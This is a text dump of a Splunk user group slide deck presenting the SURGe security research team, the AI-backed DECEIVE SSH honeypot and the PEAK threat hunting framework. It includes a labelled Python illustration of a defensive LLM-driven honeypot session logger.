  • 4. © 2023 SPLUNK INC. Who Are We? Tomáš Moser Sr. Solutions Engineer - GSS, Splunk [email protected] Technical Support Engineer, Splunk [email protected] Ingrid Nemečková Splunk Consultant, ALEF NULA [email protected] Radek Filip Michał Skórczewski Sr. Solutions Engineer, Splunk [email protected]
  • 5. © 2023 SPLUNK INC. David J. Bianco Staff Security Strategist, Splunk SURGE Passionate about improving security for everyone SANS certified instructor | Creator of Pyramid of Pain and Hunting Maturity Model | Lead author of PEAK threat hunting framework | … @DavidJBianco.bsky.social (Bluesky) [email protected] (Mastodon)
  • 6. © 2025 SPLUNK LLC Part 1: SURGe Team
  • 7. © 2025 SPLUNK LLC Splunk Users' Group Meeting David J. Bianco Staff Security Strategist SURGe by Splunk [email protected] @DavidJBianco.bsky.social @[email protected]
  • 8. Forward- looking statements © 2025 SPLUNK LLC This presentation may contain forward-looking statements that are subject to the safe harbors created under the Securities Act of 1933, as amended, and the Securities Exchange Act of 1934, as amended. All statements other than statements of historical facts are statements that could be deemed forward-looking statements. These statements are based on current expectations, estimates, forecasts, and projections about the industries in which we operate and the beliefs and assumptions of our management based on the information currently available to us. Words such as “expects,” “anticipates,” “targets,” “goals,” “projects,” “intends,” “plans,” “believes,” “momentum,” “seeks,” “estimates,” “continues,” “endeavors,” “strives,” “may,” variations of such words, and similar expressions are intended to identify such forward-looking statements. In addition, any statements that refer to (1) our goals, commitments, and programs; (2) our business plans, initiatives, and objectives; and (3) our assumptions and expectations, including our expectations regarding our financial performance, products, technology, strategy, customers, markets, acquisitions and investments are forward-looking statements. These forward-looking statements are not guarantees of future performance and involve significant risks, uncertainties and other factors that may cause our actual results, performance or achievements to be materially different from results, performance or achievements expressed or implied by the forward-looking statements contained in this presentation. 
Readers are cautioned that these forward-looking statements are only predictions and are subject to risks, uncertainties, and assumptions that are difficult to predict, including those identified in the “Risk Factors” section of Cisco’s most recent report on Form 10-Q filed on February 20, 2024 and its most recent report on Form 10-K filed on September 7, 2023, as well as the “Risk Factors” section of Splunk’s most recent report on Form 10-Q filed with the SEC on November 28, 2023. The forward-looking statements made in this presentation are made as of the time and date of this presentation. If reviewed after the initial presentation, even if made available by Cisco or Splunk, on Cisco or Splunk’s website or otherwise, it may not contain current or accurate information. Cisco and Splunk undertake no obligation to revise or update any forward-looking statements for any reason, except as required by law. In addition, any information about new products, features, functionality or our roadmap outlines our general product direction and is subject to change at any time without notice. It is for informational purposes only and shall not be incorporated into any contract or other commitment or be relied upon in making a purchasing decision. We undertake no commitment, promise or obligation either to develop the features or functionalities described, in beta or in preview (used interchangeably), or to include any such feature or functionality in a future release. The development, release, and timing of any features or functionality described for our products remains at our sole discretion. Splunk, Splunk> and Turn Data Into Doing are trademarks and registered trademarks of Splunk LLC in the United States and other countries. All other brand names, product names or trademarks belong to their respective owners. © 2025 Splunk LLC. All rights reserved.
  • 9. © 2025 SPLUNK LLC About SURGe
  • 10. © 2025 SPLUNK LLC © 2025 SPLUNK LLC Is a global team of security experts dedicated to enhancing cybersecurity through relevant strategic cybersecurity research and by providing valuable insights into the current state and evolution of cybersecurity threats. Take advantage of SURGe expertise and knowledge sharing to elevate your security operations and navigate high-profile events with confidence.
  • 11. © 2025 SPLUNK LLC Expertise to help solve security problems Security Research Practical solutions to help understand, anticipate and respond to threats Cybersecurity Insights Proactively fortify your defenses and stay ahead of threats Security Outreach Enable security teams with hands on content that enhances capabilities
  • 12. © 2025 SPLUNK LLC Meet the team
  • 13. © 2025 SPLUNK LLC > David Bianco Staff Security Strategist, SURGe ● 20+ years of experience in incident detection & response, threat hunting, CTI, and other Blue-team topics ● SANS Certified Instructor ● Creator of the Pyramid of Pain & Hunting Maturity Model ● Lead author of PEAK ● Terrible at introducing himself
  • 14. © 2025 SPLUNK LLC Published Research
  • 15. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response.
  • 16. © 2025 SPLUNK LLC Macro-ATT&CK Series Analyzing ATT&CK-mapped Threat Reporting to drive planning decisions in the SOC
  • 17. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. Evaluating CA Trustworthiness Internet security is built on TLS, which anchors its trust on Root CAs. How do we know they are all worthy of our trust?
  • 18. © 2025 SPLUNK LLC AI vs. Human-crafted Spear Phishing Old School vs. New School Will chat-based AI-assistants provide more utility to attackers, or defenders?
  • 19. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. Chrome Browser Extension Analysis Examining extensions you might use regularly, highlighting potential risks and best practices.
  • 20. © 2025 SPLUNK LLC Threat Hunting Essential Tasks and Resources What are the essential tasks and resources for Threat Hunters?
  • 21. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. The Intersection of Security and Observability Understanding Observability tools to help blue teams
  • 22. © 2025 SPLUNK LLC LLM Lifeguard: Safeguarding LLMs with Splunk and OWASP Top 10 A focused approach to securing Large Language Models
  • 23. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. Vulnerability Prioritization A case study of recent large-scale security incidents to help inform vulnerability management strategy.
  • 24. © 2025 SPLUNK LLC Gen-AI for the Blue Team Practical guidance about how to match security needs with LLM strengths when evaluating potential AI solutions for cybersecurity defense.
  • 25. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. DECEIVE A high-interaction, low-effort honeypot system that uses AI to simulate a realistic system, complete with data, that an attacker can interact with.
  • 26. © 2025 SPLUNK LLC Autonomous Adversaries: Are Blue Teams ready for Cyberattacks to go Agentic? Evaluating attacker technique use, vs. the measured ability of Language Models to accurately reproduce them – in the context of the modern, ‘agentic’ automation.
  • 27. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. Defending at Machine-Speed: Accelerated Threat Hunting with Open Weight LLM Models Integrating an open weight LM for threat hunting PowerShell scripts can speed up initial event classification by 99%, a 250x speed increase.
  • 28. © 2025 SPLUNK LLC AI for Vulnerability Investigation and Prioritisation SO many vulnerabilities, so little time! How does one understand and respond to all these new CVEs?
  • 29. © 2025 SPLUNK LLC Current Projects
  • 30. © 2025 SPLUNK LLC Post-logon Behavioural Fingerprinting and Detection Creating user behavior fingerprints in order to detect malicious logons as quickly as possible.
  • 31. © 2025 SPLUNK LLC PEAK Threat Hunter's Cookbook A structured approach to closing the gap between theory and practice in Threat Hunting. Teaching analysts to cook – with Splunk!
  • 32. © 2025 SPLUNK LLC Cybersecurity Insights
  • 33. © 2025 SPLUNK LLC The PEAK Threat Hunting Framework PEAK builds on existing frameworks (Sqrrl, TaHiTi) and helps you quickly establish repeatable, efficient hunting operations: ● Hypothesis-driven, Baseline, and Machine Learning/AI hunt procedures ● Standards for hunt documentation ● Guidelines for creating automated detection ● Metrics that highlight the impact of hunting For more on PEAK, download the official framework documentation at splk.it/PEAK-Framework
  • 34. © 2025 SPLUNK LLC Bluenomicon: The Network Defender’s Compendium Personal essays from cybersecurity luminaries Download your copy at splk.it/bluenomicon
  • 35. © 2025 SPLUNK LLC Part 2: Deceive Project
  • 36. Hi Fidelity != Hi Effort Meet DECEIVE, the AI-backed SSH Honeypot David J. Bianco Staff Security Strategist @DavidJBianco@infosec.exchange @DavidJBianco.bsky.social June 2025
  • 37. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential About Me • 20+ years of experience in incident detection & response, threat hunting, CTI, and other Blue-team topics • SANS Certified Instructor • Creator of the Pyramid of Pain & Lead author of the PEAK Threat Hunting Framework • Terrible at introducing himself
  • 38. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Why I started writing DECEIVE
  • 39. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential The problem I wanted to solve Deception is a balancing act between realism and effort The more realistic it is, the more time you must put into it to set it up Plus, real systems are vulnerable to exploitation and misuse, which can be a barrier to adoption (just ask your lawyers)
  • 40. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential How does DECEIVE address the problems? DECEIVE leverages a modular AI backend to provide all the “realism” with users, processes, and data. Given a short, simple prompt, it can simulate a variety of different SSH-accessible systems. It looks real, but there’s no actual system for threat actors to take advantage of. Example prompts: “You are a video game developer's system. Include realistic video game source and asset files.” / “You are a Cisco router running IOS XE 17.17.” / “You are a SunOS 4.1 workstation.”
  • 41. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential DECEIVE Demo!
  • 42. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Sample log: User input pwd /home/guest guest@prod-dev01:~ $
  • 43. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Sample log: Session Evaluation
  • 44. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential DECEIVE Development Me: a Python programmer with just a bit of prior LLM coding experience. From idea to first working demo: three days. • Half of that was getting the SSH code to work right. With additional enhancements courtesy of GitHub Copilot.
  • 45. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Weaknesses and Drawbacks Every session is a new system. No terminal interaction. Certain commands (e.g., vi) don’t work. You cannot move data in or out of the honeypot. Payloads can’t be downloaded. Timing depends on the LLM response time, which can be slow.
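An added illustration of the pattern these slides describe (this is not DECEIVE's own code): the persona prompt does all the emulation, while the honeypot itself only relays input, refuses the interactive commands it cannot honour, logs each exchange, and asks the model for an end-of-session verdict. The backend interface, the BENIGN/SUSPICIOUS/MALICIOUS label set and the scripted stand-in model are assumptions made for the example.

```python
from dataclasses import dataclass, field
from typing import Callable

Backend = Callable[[list], str]   # anything that maps a chat message list to model text
UNSUPPORTED = {"vi", "vim", "nano", "less", "more", "top"}  # the deck: vi does not work
VERDICTS = ("BENIGN", "SUSPICIOUS", "MALICIOUS")            # constructed label set

@dataclass
class HoneypotSession:
    persona: str            # short prompt, e.g. "You are a SunOS 4.1 workstation."
    backend: Backend
    username: str = "guest"
    host: str = "prod-dev01"
    history: list = field(default_factory=list)  # chat turns replayed to the model
    log: list = field(default_factory=list)      # what the defender keeps

    def _system_prompt(self) -> str:
        return (f"{self.persona} Reply only with what the shell would print, then the "
                f"prompt '{self.username}@{self.host}:~ $'. Never reveal you are simulated.")

    def handle(self, command: str) -> str:
        """Feed one line of attacker input to the LLM-backed shell and log the exchange."""
        name = command.split()[0] if command.split() else ""
        if name in UNSUPPORTED:
            # fail like a locked-down shell rather than let the model improvise a screen editor
            output = f"-bash: {name}: command not found\n{self.username}@{self.host}:~ $ "
        else:
            self.history.append({"role": "user", "content": command})
            output = self.backend([{"role": "system", "content": self._system_prompt()}, *self.history])
            self.history.append({"role": "assistant", "content": output})
        self.log.append({"event": "command", "input": command, "output": output})
        return output

    def evaluate(self) -> str:
        """End-of-session verdict from the model, constrained to a fixed label set."""
        transcript = "\n".join(f"$ {e['input']}\n{e['output']}" for e in self.log if e["event"] == "command")
        answer = self.backend([{"role": "system", "content": "Judge this honeypot session with "
                                "one word: " + ", ".join(VERDICTS)}, {"role": "user", "content": transcript}])
        verdict = answer.strip().upper()
        verdict = verdict if verdict in VERDICTS else "SUSPICIOUS"  # never trust free text
        self.log.append({"event": "evaluation", "verdict": verdict})
        return verdict

def scripted_backend(messages: list) -> str:
    """Constructed stand-in for an LLM so the example runs offline."""
    last = messages[-1]["content"]
    if messages[0]["content"].startswith("Judge"):
        return "malicious" if "sudo" in last else "benign"
    return ("/home/guest\n" if last == "pwd" else "") + "guest@prod-dev01:~ $ "
```

Swapping `scripted_backend` for a real chat-completion client is the only change needed to drive this from a model; the log list is what you would ship to Splunk.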
  • 46. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Future Plans Can I make it more realistic? Can I improve emulation of non-Linuxy things? Automated honeynet deployment? What about other protocols?
  • 47. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential How to get started with DECEIVE Source code is available on GitHub https://github.com/splunk/DECEIVE
  • 49. © 2025 SPLUNK LLC Part 3: PEAK Framework
  • 50. © 2025 SPLUNK LLC The PEAK Threat Hunting Framework
  • 51. © 2025 SPLUNK LLC The Sqrrl Threat Hunting Loop (2015) Everyone wanted to hunt, but few agreed on what hunting was or how to do it. Sqrrl’s threat hunting loop was the first published “how to” for threat hunting. Focused on hypothesis-driven hunting and detection improvement. Credit: Sqrrl
  • 52. © 2025 SPLUNK LLC Prepare, Execute, and Act with Knowledge. PEAK incorporates lessons and experience from the last ten years:
    More hunt types: Hypothesis-driven; Baseline (anomaly); Model-Assisted Threat Hunting (MATH); with detailed processes.
    Defined deliverables: hunt documentation; gaps & risks; stakeholder comms; detections. Not only incidents.
    Detection guidance: hierarchy of detection outputs provides additional options; helps teams target specific detections for improvement. Beyond just rules.
    Effective metrics: communicate the impact of hunting; show value across your entire security program. Better storytelling.
  • 53. © 2025 SPLUNK LLC Complete process diagrams for new hunt types: Hypothesis-Based, Baseline, Model-Assisted
  • 54. © 2025 SPLUNK LLC Defined Hunt Deliverables
  • 55. © 2025 SPLUNK LLC Detection Engineering Guidance (hierarchy of detection outputs, most to least automated):
    Signatures & Rules: Splunk® Enterprise Security, Suricata IDS, etc. Automated. Simple and easy to manage.
    Analytics in Code: Splunk® MLTK, Python, or other algorithmic detections. Automated, but more complex. May take significant resources. More management and upkeep necessary.
    Dashboards & Visualizations: Present the distilled info to humans and let them decide. Some automation, but still requires manual review on a regular basis.
    Reports: Saved searches with little or no pre-processing. Human must spend significant effort to extract meaning.
  • 56. © 2025 SPLUNK LLC Metrics to tell the story of hunting impact:
    1. Incidents Opened: number of incidents created during hunts, but also opened later as a result of detections created from hunting.
    2. Detections Created/Updated: number of new or improved detections, by type, as a result of hunting.
    3. Gaps Identified / Gaps Closed: visibility, tools, access, etc. that you didn’t have and ones that you later acquired.
    4. Vulnerabilities & Misconfigurations: updates and corrections to systems and services as a result of hunt findings.
    5. Techniques Hunted: map hunted behaviors to ATT&CK, Kill Chain, Pyramid of Pain, etc. Where are you hunting? Where should you hunt next?
  • 57. © 2025 SPLUNK LLC Reach the PEAK! Download the PEAK eBook. Join the Community Slack #peak-threat-hunting
  • 58. © 2025 SPLUNK LLC PEAK Threat Hunter's Cookbook A structured approach to closing the gap between theory and practice in Threat Hunting. Teaching analysts to cook – with Splunk! COMING AUGUST 2025
  • 59. © 2025 SPLUNK LLC The PEAK Threat Hunting Workshop ● Understand the PEAK Framework ● Master Three Types of Threat Hunts ● Hands-on Experience
  • 60. © 2025 SPLUNK LLC Where you can find us How to stay informed ● Stay up to date on all things SURGe with our Newsletter splunk.com/surge
  • 61. © 2025 SPLUNK LLC Thank you
  • 62. © 2023 SPLUNK INC. Wrap-Up ● Did you like it? ● Please fill in the post-event survey! ● Slides will be shared on SUG #7 event page and Slideshare! ● Talk to us :-) Slack Register and subscribe to #ug_prague channel Email tommoser@cisco.com inemecko@cisco.com radek.filip@alef.com mskorcze@cisco.com LinkedIn https://www.linkedin.com/groups/9544692/
  • 63. © 2023 SPLUNK INC. See you next time